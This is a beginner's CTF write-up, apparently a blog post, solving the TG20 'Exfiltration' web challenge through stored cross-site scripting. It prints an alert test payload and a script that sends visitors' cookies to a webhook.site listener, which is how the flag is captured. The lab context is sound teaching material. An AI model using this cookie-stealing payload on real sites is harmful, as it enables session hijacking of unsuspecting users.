mrn00b0t

Interfacing between technophile and technophobe

TG20 – Exfiltration – Web Challenge – Cross Site Scripting (XSS)

I liked this challenge! I’d read a bit about different types of XSS, but it was great to see how they work in practice.

We begin presented with a blank field to enter text, and a “Send Message” button.

Examination of the HTML code reveals nothing of interest.

The first thing I attempted was a Cross Site Script (XSS). I input the following message and hit send:

hello <script>alert(1)</script>

Sure enough, the page refreshes with my message “hello” but it also posts the alert box, so it is vulnerable to XSS.

I got a little lost at this point, since this XSS is a client side operation, so how could I get it to run server side?

I tried Server Side Inclusion without success; then a team mate suggested I consider the challenge wording.

Being new to CTF I thought what you see is what you get, but it became clear that there was an automation to simulate a person visiting the page to read what was posted.

With that knowledge, construction of a stored XSS was required.

First we need to set up a listener. I used https://webhook.site

This site provides randomly generated URL and email for temporary use.

The URL is of the form httpx://webhook.site/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx

Zoom to view

The following string redirects any visitors browser to our webhook site and steals their cookie.

hello <script>site=’httpx://webhook.site/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxx/?cookie=’;cookie=document.cookie; site=site.concat(cookie); document.location=site; </script>

Once we send this message, we can return to our webhook tab and the flag should be visible as a cookie:

flag=TG20{exfiltration_is_best_filtration}

Zoom to view

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: